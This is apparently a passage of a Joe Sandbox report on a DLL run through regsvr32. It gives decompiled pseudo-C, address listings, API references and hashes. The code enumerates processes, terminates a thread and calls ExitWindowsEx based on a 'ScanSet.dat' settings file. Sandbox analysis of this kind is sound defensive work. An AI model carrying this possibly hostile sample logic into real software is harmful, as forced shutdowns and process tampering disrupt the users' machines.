                                                                                                                					_t80 = _t322 + 0x64; // 0x1001cd6c
                                                                                                                					_t255 =  *_t80;
                                                                                                                					_t81 = _t151 + 4; // 0x1001cdb6
                                                                                                                					_t299 = _t81;
                                                                                                                					if(_t81 > _t255) {
                                                                                                                						_t82 = _t322 + 0x3c; // 0x10056968
                                                                                                                						E1001FADC(_t82, _t299, _t151 - _t255 + 4);
                                                                                                                						_t83 = _t322 + 0x64; // 0x1001cdb2
                                                                                                                						_t255 =  *_t83;
                                                                                                                						_t84 = _t322 + 0x60; // 0x100027d0
                                                                                                                						_t151 =  *_t84;
                                                                                                                					}
                                                                                                                					_t152 = _t151 + 4;
                                                                                                                					_t334 =  *(_t322 + 0x50) & 0x00000001;
                                                                                                                					 *(_t322 + 0x60) = _t152;
                                                                                                                					if(( *(_t322 + 0x50) & 0x00000001) == 0) {
                                                                                                                						_t89 = _t322 + 0x4c; // 0x1002f68d
                                                                                                                						_push( *_t89);
                                                                                                                						_push(4);
                                                                                                                						_t152 = E10020287(3, _t299, _t312, _t315, _t334);
                                                                                                                					}
                                                                                                                					_t90 =  &(_t152[1]); // 0x4
                                                                                                                					_t300 = _t90;
                                                                                                                					if(_t90 > _t255) {
                                                                                                                						_t91 = _t322 + 0x3c; // 0x1005695c
                                                                                                                						E1001FADC(_t91, _t300, _t152 - _t255 + 4);
                                                                                                                						_t92 = _t322 + 0x64; // 0x10035bfe
                                                                                                                						_t255 =  *_t92;
                                                                                                                						_t93 = _t322 + 0x60; // 0x10035bfe
                                                                                                                						_t152 =  *_t93;
                                                                                                                					}
                                                                                                                					_t153 =  &(_t152[1]);
                                                                                                                					_t337 =  *(_t322 + 0x50) & 0x00000001;
                                                                                                                					 *(_t322 + 0x60) = _t153;
                                                                                                                					if(( *(_t322 + 0x50) & 0x00000001) == 0) {
                                                                                                                						_t98 = _t322 + 0x4c; // 0x10001480
                                                                                                                						_push( *_t98);
                                                                                                                						_push(4);
                                                                                                                						_t153 = E10020287(3, _t300, _t312, _t315, _t337);
                                                                                                                					}
                                                                                                                					_t99 =  &(_t153[1]); // 0x4
                                                                                                                					_t301 = _t99;
                                                                                                                					if(_t99 > _t255) {
                                                                                                                						_t100 = _t322 + 0x3c; // 0x10056950
                                                                                                                						E1001FADC(_t100, _t301, _t153 - _t255 + 4);
                                                                                                                						_t101 = _t322 + 0x64; // 0x1002f68d
                                                                                                                						_t255 =  *_t101;
                                                                                                                						_t102 = _t322 + 0x60; // 0x10017ddd
                                                                                                                						_t153 =  *_t102;
                                                                                                                					}
                                                                                                                					_t154 =  &(_t153[1]);
                                                                                                                					_t340 =  *(_t322 + 0x50) & 0x00000001;
                                                                                                                					 *(_t322 + 0x60) = _t154;
                                                                                                                					if(( *(_t322 + 0x50) & 0x00000001) == 0) {
                                                                                                                						_t107 = _t322 + 0x4c; // 0x10060370
                                                                                                                						_push( *_t107);
                                                                                                                						_push(4);
                                                                                                                						_t154 = E10020287(3, _t301, _t312, _t315, _t340);
                                                                                                                					}
                                                                                                                					_t108 =  &(_t154[1]); // 0x4
                                                                                                                					_t302 = _t108;
                                                                                                                					if(_t108 > _t255) {
                                                                                                                						_t109 = _t322 + 0x3c; // 0x10056944
                                                                                                                						E1001FADC(_t109, _t302, _t154 - _t255 + 4);
                                                                                                                						_t110 = _t322 + 0x64; // 0x10001480
                                                                                                                						_t255 =  *_t110;
                                                                                                                						_t111 = _t322 + 0x60; // 0x10014ca0
                                                                                                                						_t154 =  *_t111;
                                                                                                                					}
                                                                                                                					_t155 =  &(_t154[1]);
                                                                                                                					_t343 =  *(_t322 + 0x50) & 0x00000001;
                                                                                                                					 *(_t322 + 0x60) = _t155;
                                                                                                                					if(( *(_t322 + 0x50) & 0x00000001) == 0) {
                                                                                                                						_t116 = _t322 + 0x4c; // 0x100025a0
                                                                                                                						_push( *_t116);
                                                                                                                						_push(4);
                                                                                                                						_t155 = E10020287(3, _t302, _t312, _t315, _t343);
                                                                                                                					}
                                                                                                                					_t117 =  &(_t155[1]); // 0x4
                                                                                                                					_t297 = _t117;
                                                                                                                					if(_t117 > _t255) {
                                                                                                                						_t345 = _t155 - _t255 + 4;
                                                                                                                						_t118 = _t322 + 0x3c; // 0x10056938
                                                                                                                						E1001FADC(_t118, _t297, _t155 - _t255 + 4);
                                                                                                                						_t119 = _t322 + 0x60; // 0x0
                                                                                                                						_t155 =  *_t119;
                                                                                                                					}
                                                                                                                					_t315 =  *_t155;
                                                                                                                					_t120 = _t322 + 0x38; // 0x10056934
                                                                                                                					 *(_t322 + 0x60) =  &(_t155[1]);
                                                                                                                					E1001FEB3(_t120, _t345);
                                                                                                                					_t122 = _t322 + 0x28; // 0x10056924
                                                                                                                					E10020580(3, _t122);
                                                                                                                					_t346 =  *_t155 - _t319;
                                                                                                                					if( *_t155 == _t319) {
                                                                                                                						ExitWindowsEx(8, _t319);
                                                                                                                					}
                                                                                                                					_t123 = _t322 + 0x38; // 0x10056980
                                                                                                                					 *(_t322 + 0x88) = 3;
                                                                                                                					E1002001A(3, _t123, _t297, _t312, _t315, _t346);
                                                                                                                				}
                                                                                                                				_t125 = _t322 + 0x28; // 0x10056970
                                                                                                                				 *(_t322 + 0x88) = 0xffffffff;
                                                                                                                				E100206EF(3, _t125, _t297, _t312, _t315, _t346);
                                                                                                                				_t127 = _t322 + 0x80; // 0x1001ca75
                                                                                                                				 *[fs:0x0] =  *_t127;
                                                                                                                				return 0;
                                                                                                                			}




























































                                                                                                                0x100103fc
                                                                                                                0x10010400
                                                                                                                0x10010400
                                                                                                                0x10010405
                                                                                                                0x1001040d
                                                                                                                0x10010411
                                                                                                                0x10010416
                                                                                                                0x10010416
                                                                                                                0x1001041a
                                                                                                                0x1001041a
                                                                                                                0x1001041a
                                                                                                                0x1001041e
                                                                                                                0x10010421
                                                                                                                0x10010426
                                                                                                                0x1001042a
                                                                                                                0x1001042c
                                                                                                                0x10010430
                                                                                                                0x10010431
                                                                                                                0x10010433
                                                                                                                0x10010433
                                                                                                                0x10010438
                                                                                                                0x10010438
                                                                                                                0x1001043d
                                                                                                                0x10010445
                                                                                                                0x10010449
                                                                                                                0x1001044e
                                                                                                                0x1001044e
                                                                                                                0x10010452
                                                                                                                0x10010452
                                                                                                                0x10010452
                                                                                                                0x10010456
                                                                                                                0x10010459
                                                                                                                0x1001045e
                                                                                                                0x10010462
                                                                                                                0x10010464
                                                                                                                0x10010468
                                                                                                                0x10010469
                                                                                                                0x1001046b
                                                                                                                0x1001046b
                                                                                                                0x10010470
                                                                                                                0x10010470
                                                                                                                0x10010475
                                                                                                                0x1001047d
                                                                                                                0x10010481
                                                                                                                0x10010486
                                                                                                                0x10010486
                                                                                                                0x1001048a
                                                                                                                0x1001048a
                                                                                                                0x1001048a
                                                                                                                0x1001048e
                                                                                                                0x10010491
                                                                                                                0x10010496
                                                                                                                0x1001049a
                                                                                                                0x1001049c
                                                                                                                0x100104a0
                                                                                                                0x100104a1
                                                                                                                0x100104a3
                                                                                                                0x100104a3
                                                                                                                0x100104a8
                                                                                                                0x100104a8
                                                                                                                0x100104ad
                                                                                                                0x100104b5
                                                                                                                0x100104b9
                                                                                                                0x100104be
                                                                                                                0x100104be
                                                                                                                0x100104c2
                                                                                                                0x100104c2
                                                                                                                0x100104c2
                                                                                                                0x100104c6
                                                                                                                0x100104c9
                                                                                                                0x100104ce
                                                                                                                0x100104d2
                                                                                                                0x100104d4
                                                                                                                0x100104d8
                                                                                                                0x100104d9
                                                                                                                0x100104db
                                                                                                                0x100104db
                                                                                                                0x100104e0
                                                                                                                0x100104e0
                                                                                                                0x100104e5
                                                                                                                0x100104e9
                                                                                                                0x100104ed
                                                                                                                0x100104f1
                                                                                                                0x100104f6
                                                                                                                0x100104f6
                                                                                                                0x100104f6
                                                                                                                0x100104fa
                                                                                                                0x100104ff
                                                                                                                0x10010503
                                                                                                                0x10010507
                                                                                                                0x1001050c
                                                                                                                0x10010510
                                                                                                                0x10010515
                                                                                                                0x10010517
                                                                                                                0x1001051c
                                                                                                                0x1001051c
                                                                                                                0x10010522
                                                                                                                0x10010526
                                                                                                                0x1001052d
                                                                                                                0x1001052d
                                                                                                                0x10010532
                                                                                                                0x10010536
                                                                                                                0x10010541
                                                                                                                0x10010548
                                                                                                                0x1001054f
                                                                                                                0x1001055e

                                                                                                                APIs
                                                                                                                • SendMessageA.USER32 ref: 100102A7
                                                                                                                • TerminateThread.KERNEL32(?,00000000,DF7C0CDA), ref: 100102C0
                                                                                                                • SendMessageA.USER32 ref: 100102DF
                                                                                                                  • Part of subcall function 1000CD90: _memset.LIBCMT ref: 1000CE18
                                                                                                                  • Part of subcall function 1000CD90: EnumProcesses.PSAPI(?,00001000,?,?,00000000,00000103), ref: 1000CE2F
                                                                                                                  • Part of subcall function 1000CD90: OpenProcess.KERNEL32(00000410,00000000,?,?,00001000,?,?,00000000,00000103), ref: 1000CE57
                                                                                                                  • Part of subcall function 1000CD90: EnumProcessModules.PSAPI(00000000,?,00000004,?), ref: 1000CE74
                                                                                                                  • Part of subcall function 1000CD90: GetModuleFileNameExA.PSAPI(00000000,?,?,00000104,00000000,?,00000004,?), ref: 1000CE8C
                                                                                                                  • Part of subcall function 1000CD90: GetShortPathNameA.KERNEL32 ref: 1000CEA1
                                                                                                                  • Part of subcall function 1000CD90: __itoa.LIBCMT ref: 1000CEB2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: EnumMessageNameProcessSend$FileModuleModulesOpenPathProcessesShortTerminateThread__itoa_memset
                                                                                                                • String ID: Setting\ScanSet.dat
                                                                                                                • API String ID: 581762207-908802073
                                                                                                                • Opcode ID: b376410783cdb246a1f32bd2672f183425c69d2eed36791397f28db9980777e1
                                                                                                                • Instruction ID: a08358b2d6b05e09ee734bb055c70b23d7c28da2dba7e2bbd964ecf404e5a9f5
                                                                                                                • Opcode Fuzzy Hash: b376410783cdb246a1f32bd2672f183425c69d2eed36791397f28db9980777e1
                                                                                                                • Instruction Fuzzy Hash: F2F18B752043419FE304DB64CD85FAA77E6FB88358F44892CF5898B292DBB0F985CB52
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 85%
                                                                                                                			E1001005E(void* __ebx, long __ebp, intOrPtr _a4, char _a12, signed int _a16, signed int* _a20, signed int _a24, char _a28, signed int _a32, signed int _a36, char _a48, long* _a52, char _a56, char _a92, char _a96, char _a112, char _a120, char _a128, char _a132, intOrPtr _a136, long _a140) {
                                                                                                                				signed int _v0;
                                                                                                                				char _v4;
                                                                                                                				signed int _v24;
                                                                                                                				signed int _t123;
                                                                                                                				signed int _t128;
                                                                                                                				void* _t136;
                                                                                                                				intOrPtr _t142;
                                                                                                                				long* _t143;
                                                                                                                				long* _t144;
                                                                                                                				long* _t145;
                                                                                                                				long* _t146;
                                                                                                                				void* _t172;
                                                                                                                				void* _t178;
                                                                                                                				signed int _t182;
                                                                                                                				signed int _t183;
                                                                                                                				signed int _t185;
                                                                                                                				signed int _t187;
                                                                                                                				signed int _t189;
                                                                                                                				signed int _t191;
                                                                                                                				signed int _t193;
                                                                                                                				intOrPtr _t203;
                                                                                                                				signed int _t212;
                                                                                                                				void* _t213;
                                                                                                                				signed int _t214;
                                                                                                                				signed int _t215;
                                                                                                                				signed int _t217;
                                                                                                                				signed int _t219;
                                                                                                                				void* _t227;
                                                                                                                				long _t231;
                                                                                                                				long _t233;
                                                                                                                				void* _t253;
                                                                                                                
                                                                                                                				_t231 = __ebp;
                                                                                                                				_t178 = __ebx;
                                                                                                                				while(1) {
                                                                                                                					__esi = _a32;
                                                                                                                					__eax = E100173A6();
                                                                                                                					__ecx = 0;
                                                                                                                					__eflags = __eax - __ebp;
                                                                                                                					__ecx = 0 | __eax != __ebp;
                                                                                                                					__eflags = __ecx - __ebp;
                                                                                                                					if(__ecx == __ebp) {
                                                                                                                						break;
                                                                                                                					}
                                                                                                                					__edx =  *__eax;
                                                                                                                					__ecx = __eax;
                                                                                                                					 *((intOrPtr*)(__edx + 0xc)) =  *((intOrPtr*)( *((intOrPtr*)(__edx + 0xc))))();
                                                                                                                					__eax =  *((intOrPtr*)(__edx + 0xc)) + 0x10;
                                                                                                                					_a24 =  *((intOrPtr*)(__edx + 0xc)) + 0x10;
                                                                                                                					__eflags = __ebx - __ebp;
                                                                                                                					_a136 = __ebp;
                                                                                                                					if(__eflags < 0) {
                                                                                                                						L20:
                                                                                                                						__eax = E1001729E(__ebx, __ecx, __edi, __esi, __eflags);
                                                                                                                						goto L21;
                                                                                                                					} else {
                                                                                                                						__eflags = __ebx -  *((intOrPtr*)(__esi + 8));
                                                                                                                						if(__eflags >= 0) {
                                                                                                                							goto L20;
                                                                                                                						} else {
                                                                                                                							__ecx =  *(__esi + 4);
                                                                                                                							__eax = __ecx + __ebx * 4;
                                                                                                                							_push(__ecx + __ebx * 4);
                                                                                                                							__ecx =  &_a24;
                                                                                                                							__eax = E10001FF0( &_a24);
                                                                                                                							__ecx =  *0x1006f050; // 0x0
                                                                                                                							__esi = _a20;
                                                                                                                							__ecx = __ecx + 0x4fc;
                                                                                                                							__eax = E1001D2C4(__ecx, __esi);
                                                                                                                							_push(__ecx);
                                                                                                                							__ebp = __esi - 0x10;
                                                                                                                							_a20 = __esp;
                                                                                                                							__edi = __esp;
                                                                                                                							__eax = E10001080(__ebx, __ebp);
                                                                                                                							__eax = __eax + 0x10;
                                                                                                                							__esp =  &(__esp[1]);
                                                                                                                							__edx =  &_a12;
                                                                                                                							 *__edi = __eax;
                                                                                                                							__ecx =  *0x1006f050; // 0x0
                                                                                                                							E1000E6F0(__ecx, __edx, __eflags, __edx) = _a4;
                                                                                                                							_a120 = 1;
                                                                                                                							__eax = E1003BD06(_a4, 0x10056948);
                                                                                                                							__eflags = __eax;
                                                                                                                							__eax = __eax & 0xffffff00 | __eax != 0x00000000;
                                                                                                                							__eflags = __al;
                                                                                                                							if(__al != 0) {
                                                                                                                								__eax =  *0x1006f050; // 0x0
                                                                                                                								__edx =  *(__eax + 0x10ec);
                                                                                                                								_t23 = __eax + 0x358; // 0x358
                                                                                                                								__ecx = _t23;
                                                                                                                								__eax = E10026562(_t23, 1,  *(__eax + 0x10ec), 0x10056948, 0, 0, 0, 0);
                                                                                                                								__eax =  *0x1006f050; // 0x0
                                                                                                                								__ecx =  *(__eax + 0x10ec);
                                                                                                                								_t25 = __eax + 0x358; // 0x358
                                                                                                                								__ecx = _t25;
                                                                                                                								__eax = E1002637C(_t25,  *(__eax + 0x10ec), 0, __esi);
                                                                                                                								__edx = _v24;
                                                                                                                								__eax =  *0x1006f050; // 0x0
                                                                                                                								__ecx =  *(__eax + 0x10ec);
                                                                                                                								_t28 = __eax + 0x358; // 0x358
                                                                                                                								__ecx = _t28;
                                                                                                                								__eax = E1002637C(_t28,  *(__eax + 0x10ec), 1, __edx);
                                                                                                                								__eax =  *0x1006f050; // 0x0
                                                                                                                								_t29 = __eax + 0x10ec;
                                                                                                                								 *_t29 =  *(__eax + 0x10ec) + 1;
                                                                                                                								__eflags =  *_t29;
                                                                                                                							}
                                                                                                                							__eax =  *0x1006f050; // 0x0
                                                                                                                							 *(__eax + 0x10e8) =  *(__eax + 0x10e8) + 1;
                                                                                                                							__eax = E100173A6();
                                                                                                                							__ecx = 0;
                                                                                                                							__eflags = __eax;
                                                                                                                							__ecx = 0 | __eax != 0x00000000;
                                                                                                                							__eflags = __ecx;
                                                                                                                							if(__ecx == 0) {
                                                                                                                								break;
                                                                                                                							} else {
                                                                                                                								__edx =  *__eax;
                                                                                                                								__ecx = __eax;
                                                                                                                								 *((intOrPtr*)(__edx + 0xc)) =  *((intOrPtr*)( *((intOrPtr*)(__edx + 0xc))))();
                                                                                                                								__eax =  *((intOrPtr*)(__edx + 0xc)) + 0x10;
                                                                                                                								_a24 =  *((intOrPtr*)(__edx + 0xc)) + 0x10;
                                                                                                                								__eax =  *0x1006f050; // 0x0
                                                                                                                								__ecx =  *(__eax + 0x10f0);
                                                                                                                								__edx =  *(__eax + 0x10ec);
                                                                                                                								__eax =  *(__eax + 0x10e8);
                                                                                                                								_push(__ecx);
                                                                                                                								_push(__edx);
                                                                                                                								__ecx =  &_a24;
                                                                                                                								_a132 = 2;
                                                                                                                								__eax = E10003500( &_a24, 0x1005873c, __eax);
                                                                                                                								__ecx =  *0x1006f050; // 0x0
                                                                                                                								__esi = _a24;
                                                                                                                								__ecx = __ecx + 0x304;
                                                                                                                								__eax = E1001D2C4(__ecx, __esi);
                                                                                                                								__eax = __esi - 0x10;
                                                                                                                								_a128 = 1;
                                                                                                                								_t45 = __eax + 0xc; // 0xc
                                                                                                                								__edx = _t45;
                                                                                                                								__ecx = __ecx | 0xffffffff;
                                                                                                                								asm("lock xadd [edx], ecx");
                                                                                                                								__ecx = __ecx - 1;
                                                                                                                								__eflags = __ecx;
                                                                                                                								if(__ecx <= 0) {
                                                                                                                									__ecx =  *__eax;
                                                                                                                									__edx =  *( *__eax);
                                                                                                                									 *((intOrPtr*)(__edx + 4)) =  *((intOrPtr*)( *((intOrPtr*)(__edx + 4))))(__eax);
                                                                                                                								}
                                                                                                                								__eax = _a16;
                                                                                                                								__eax = _a16 + 0xfffffff0;
                                                                                                                								_a132 = 0;
                                                                                                                								__ecx = __eax + 0xc;
                                                                                                                								__edx = __edx | 0xffffffff;
                                                                                                                								asm("lock xadd [ecx], edx");
                                                                                                                								__edx = __edx - 1;
                                                                                                                								__eflags = __edx;
                                                                                                                								if(__edx <= 0) {
                                                                                                                									__ecx =  *__eax;
                                                                                                                									__edx =  *( *__eax);
                                                                                                                									 *((intOrPtr*)(__edx + 4)) =  *((intOrPtr*)( *((intOrPtr*)(__edx + 4))))(__eax);
                                                                                                                								}
                                                                                                                								_a132 = 0xffffffff;
                                                                                                                								__ecx =  &_a12;
                                                                                                                								__edx = __edx | 0xffffffff;
                                                                                                                								asm("lock xadd [ecx], edx");
                                                                                                                								__edx = __edx - 1;
                                                                                                                								__eflags = __edx;
                                                                                                                								if(__edx <= 0) {
                                                                                                                									__ecx = _v0;
                                                                                                                									__eax =  *__ecx;
                                                                                                                									__edx =  *( *__ecx + 4);
                                                                                                                									__eax =  *__edx(__ebp);
                                                                                                                								}
                                                                                                                								__ebx = __ebx + 1;
                                                                                                                								__ebp = 0;
                                                                                                                								__eflags = __ebx - _a32;
                                                                                                                								if(__eflags < 0) {
                                                                                                                									continue;
                                                                                                                								} else {
                                                                                                                									_t229 = _a140;
                                                                                                                									_t227 = SendMessageA;
                                                                                                                									if(_t229 != 0) {
                                                                                                                										L2:
                                                                                                                										_t212 =  *0x1006f050; // 0x0
                                                                                                                										_t213 = _t212 + 0x550;
                                                                                                                										_t172 = E10026483(_t213, _t229);
                                                                                                                										_t236 = _t172;
                                                                                                                										if(_t172 == 0) {
                                                                                                                											L21:
                                                                                                                											E1000FE50(_t231, _t229);
                                                                                                                											_t233 = _t233 + 4;
                                                                                                                										} else {
                                                                                                                											_push(_t213);
                                                                                                                											_t215 =  *0x1006f050; // 0x0
                                                                                                                											_a140 = _t233;
                                                                                                                											_push(_t229);
                                                                                                                											E10026A46(_t178, _t215 + 0x550, _t218, _t227, _t229, _t236);
                                                                                                                											_t217 =  *0x1006f050; // 0x0
                                                                                                                											E1000EC00(_t217, _t218, _t236, _t233);
                                                                                                                										}
                                                                                                                										_t214 =  *0x1006f050; // 0x0
                                                                                                                										_t218 =  *(_t214 + 0x570);
                                                                                                                										_t229 = SendMessageA( *(_t214 + 0x570), 0x110a, 1, _t229);
                                                                                                                										_t237 = _t229 - _t231;
                                                                                                                										if(_t229 != _t231) {
                                                                                                                											goto L2;
                                                                                                                										}
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                					_t123 =  *0x1006f050; // 0x0
                                                                                                                					TerminateThread( *(_t123 + 0x28c), _t231);
                                                                                                                					_t219 =  *0x1006f050; // 0x0
                                                                                                                					SendMessageA( *(_t219 + 0x20), 0x111, 0xfff555ee, 0xf55555ee);
                                                                                                                					E1002181C(_t178, _t227, _t229, _t237, 0x10058350, _t231, _t231);
                                                                                                                					_t182 =  *0x1006f050; // 0x0
                                                                                                                					 *(_t182 + 0x10e8) = _t231;
                                                                                                                					_t220 =  *0x1006f050; // 0x0
                                                                                                                					 *(_t220 + 0x10ec) = _t231;
                                                                                                                					_t128 =  *0x1006f050; // 0x0
                                                                                                                					 *(_t128 + 0x10f0) = _t231;
                                                                                                                					_t183 =  *0x1006f050; // 0x0
                                                                                                                					E1001D2C4(_t183 + 0x4fc, 0x10056948);
                                                                                                                					_t185 =  *0x1006f050; // 0x0
                                                                                                                					E1001D2C4(_t185 + 0x454, 0x10056948);
                                                                                                                					_t187 =  *0x1006f050; // 0x0
                                                                                                                					E1001D39A(_t187 + 0x4a8, 1);
                                                                                                                					_t189 =  *0x1006f050; // 0x0
                                                                                                                					E1001D2C4(_t189 + 0x304, 0x10056948);
                                                                                                                					_t191 =  *0x1006f050; // 0x0
                                                                                                                					E1001D39A(_t191 + 0x400, _t231);
                                                                                                                					_t193 =  *0x1006f050; // 0x0
                                                                                                                					E1001D39A(_t193 + 0x3ac, _t231);
                                                                                                                					_t61 =  &_v0; // 0x1005694c
                                                                                                                					E100205E2(_t61, _t237);
                                                                                                                					_push(_t231);
                                                                                                                					_push(0x40);
                                                                                                                					_push("Setting\\ScanSet.dat");
                                                                                                                					_t62 =  &_v0; // 0x1005694c
                                                                                                                					_a96 = 3;
                                                                                                                					_t136 = E10020A24(_t62, _t220, _t237);
                                                                                                                					_t238 = _t136;
                                                                                                                					if(_t136 != 0) {
                                                                                                                						_t64 =  &_a24; // 0x10001b00
                                                                                                                						_t65 =  *_t64 + 0x28; // 0xcccccccc
                                                                                                                						 *((intOrPtr*)( *_t65))(_t231, _t231, _t231);
                                                                                                                						_push(_t231);
                                                                                                                						_push(0x1000);
                                                                                                                						_push(1);
                                                                                                                						_t67 =  &_a12; // 0x10056970
                                                                                                                						_t68 =  &_a28; // 0x10056980
                                                                                                                						E10020058(3, _t68,  *_t64, _t227, _t229, _t238);
                                                                                                                						_t239 = _a36 & 0x00000001;
                                                                                                                						_a92 = 4;
                                                                                                                						if((_a36 & 0x00000001) == 0) {
                                                                                                                							_t73 =  &_a32; // 0x10035bfe
                                                                                                                							_push( *_t73);
                                                                                                                							_push(4);
                                                                                                                							E10020287(3,  *_t73, _t227, _t229, _t239);
                                                                                                                						}
                                                                                                                						_t74 =  &_a52; // 0x1001cdb2
                                                                                                                						_t142 =  *_t74;
                                                                                                                						_t75 =  &_a56; // 0x1001cd6c
                                                                                                                						_t203 =  *_t75;
                                                                                                                						_t76 = _t142 + 4; // 0x1001cdb6
                                                                                                                						_t222 = _t76;
                                                                                                                						if(_t76 > _t203) {
                                                                                                                							_t77 =  &_a12; // 0x10056968
                                                                                                                							E1001FADC(_t77, _t222, _t142 - _t203 + 4);
                                                                                                                							_t78 =  &_a52; // 0x1001cdb2
                                                                                                                							_t203 =  *_t78;
                                                                                                                							_t79 =  &_a48; // 0x100027d0
                                                                                                                							_t142 =  *_t79;
                                                                                                                						}
                                                                                                                						_t143 = _t142 + 4;
                                                                                                                						_t242 = _a36 & 0x00000001;
                                                                                                                						_a52 = _t143;
                                                                                                                						if((_a36 & 0x00000001) == 0) {
                                                                                                                							_t84 =  &_a32; // 0x1002f68d
                                                                                                                							_push( *_t84);
                                                                                                                							_push(4);
                                                                                                                							_t143 = E10020287(3, _t222, _t227, _t229, _t242);
                                                                                                                						}
                                                                                                                						_t85 = _t143 + 4; // 0x4
                                                                                                                						_t223 = _t85;
                                                                                                                						if(_t85 > _t203) {
                                                                                                                							_t86 =  &_a12; // 0x1005695c
                                                                                                                							E1001FADC(_t86, _t223, _t143 - _t203 + 4);
                                                                                                                							_t87 =  &_a52; // 0x10035bfe
                                                                                                                							_t203 =  *_t87;
                                                                                                                							_t88 =  &_a48; // 0x10035bfe
                                                                                                                							_t143 =  *_t88;
                                                                                                                						}
                                                                                                                						_t144 = _t143 + 4;
                                                                                                                						_t245 = _a36 & 0x00000001;
                                                                                                                						_a52 = _t144;
                                                                                                                						if((_a36 & 0x00000001) == 0) {
                                                                                                                							_t93 =  &_a32; // 0x10001480
                                                                                                                							_push( *_t93);
                                                                                                                							_push(4);
                                                                                                                							_t144 = E10020287(3, _t223, _t227, _t229, _t245);
                                                                                                                						}
                                                                                                                						_t94 = _t144 + 4; // 0x4
                                                                                                                						_t224 = _t94;
                                                                                                                						if(_t94 > _t203) {
                                                                                                                							_t95 =  &_a12; // 0x10056950
                                                                                                                							E1001FADC(_t95, _t224, _t144 - _t203 + 4);
                                                                                                                							_t96 =  &_a52; // 0x1002f68d
                                                                                                                							_t203 =  *_t96;
                                                                                                                							_t97 =  &_a48; // 0x10017ddd
                                                                                                                							_t144 =  *_t97;
                                                                                                                						}
                                                                                                                						_t145 = _t144 + 4;
                                                                                                                						_t248 = _a36 & 0x00000001;
                                                                                                                						_a52 = _t145;
                                                                                                                						if((_a36 & 0x00000001) == 0) {
                                                                                                                							_t102 =  &_a32; // 0x10060370
                                                                                                                							_push( *_t102);
                                                                                                                							_push(4);
                                                                                                                							_t145 = E10020287(3, _t224, _t227, _t229, _t248);
                                                                                                                						}
                                                                                                                						_t103 = _t145 + 4; // 0x4
                                                                                                                						_t225 = _t103;
                                                                                                                						if(_t103 > _t203) {
                                                                                                                							_t104 =  &_a12; // 0x10056944
                                                                                                                							E1001FADC(_t104, _t225, _t145 - _t203 + 4);
                                                                                                                							_t105 =  &_a52; // 0x10001480
                                                                                                                							_t203 =  *_t105;
                                                                                                                							_t106 =  &_a48; // 0x10014ca0
                                                                                                                							_t145 =  *_t106;
                                                                                                                						}
                                                                                                                						_t146 = _t145 + 4;
                                                                                                                						_t251 = _a36 & 0x00000001;
                                                                                                                						_a52 = _t146;
                                                                                                                						if((_a36 & 0x00000001) == 0) {
                                                                                                                							_t111 =  &_a32; // 0x100025a0
                                                                                                                							_push( *_t111);
                                                                                                                							_push(4);
                                                                                                                							_t146 = E10020287(3, _t225, _t227, _t229, _t251);
                                                                                                                						}
                                                                                                                						_t112 =  &(_t146[1]); // 0x4
                                                                                                                						_t220 = _t112;
                                                                                                                						if(_t112 > _t203) {
                                                                                                                							_t253 = _t146 - _t203 + 4;
                                                                                                                							_t113 =  &_a12; // 0x10056938
                                                                                                                							E1001FADC(_t113, _t220, _t146 - _t203 + 4);
                                                                                                                							_t114 =  &_a48; // 0x0
                                                                                                                							_t146 =  *_t114;
                                                                                                                						}
                                                                                                                						_t229 =  *_t146;
                                                                                                                						_t115 =  &_a12; // 0x10056934
                                                                                                                						_a52 =  &(_t146[1]);
                                                                                                                						E1001FEB3(_t115, _t253);
                                                                                                                						_t117 =  &_v4; // 0x10056924
                                                                                                                						E10020580(3, _t117);
                                                                                                                						_t254 =  *_t146 - _t231;
                                                                                                                						if( *_t146 == _t231) {
                                                                                                                							ExitWindowsEx(8, _t231);
                                                                                                                						}
                                                                                                                						_t118 =  &_a12; // 0x10056980
                                                                                                                						_a92 = 3;
                                                                                                                						E1002001A(3, _t118, _t220, _t227, _t229, _t254);
                                                                                                                					}
                                                                                                                					_t120 =  &_a24; // 0x10056970
                                                                                                                					_a120 = 0xffffffff;
                                                                                                                					E100206EF(3, _t120, _t220, _t227, _t229, _t254);
                                                                                                                					_t122 =  &_a112; // 0x1001ca75
                                                                                                                					 *[fs:0x0] =  *_t122;
                                                                                                                					return 0;
                                                                                                                				}
                                                                                                                				__eax = E10001000(__ecx, __edx, 0x80004005);
                                                                                                                				goto L20;
                                                                                                                			}


































                                                                                                                0x1001033c
                                                                                                                0x1001034a
                                                                                                                0x1001034f
                                                                                                                0x10010360
                                                                                                                0x10010365
                                                                                                                0x10010372
                                                                                                                0x10010377
                                                                                                                0x10010384
                                                                                                                0x10010389
                                                                                                                0x1001038d
                                                                                                                0x10010392
                                                                                                                0x10010393
                                                                                                                0x1001039a
                                                                                                                0x1001039f
                                                                                                                0x100103a3
                                                                                                                0x100103aa
                                                                                                                0x100103af
                                                                                                                0x100103b1
                                                                                                                0x100103b7
                                                                                                                0x100103bb
                                                                                                                0x100103c5
                                                                                                                0x100103c7
                                                                                                                0x100103c8
                                                                                                                0x100103cd
                                                                                                                0x100103cf
                                                                                                                0x100103d4
                                                                                                                0x100103d8
                                                                                                                0x100103dd
                                                                                                                0x100103e2
                                                                                                                0x100103ea
                                                                                                                0x100103ec
                                                                                                                0x100103f0
                                                                                                                0x100103f1
                                                                                                                0x100103f3
                                                                                                                0x100103f3
                                                                                                                0x100103f8
                                                                                                                0x100103f8
                                                                                                                0x100103fc
                                                                                                                0x100103fc
                                                                                                                0x10010400
                                                                                                                0x10010400
                                                                                                                0x10010405
                                                                                                                0x1001040d
                                                                                                                0x10010411
                                                                                                                0x10010416
                                                                                                                0x10010416
                                                                                                                0x1001041a
                                                                                                                0x1001041a
                                                                                                                0x1001041a
                                                                                                                0x1001041e
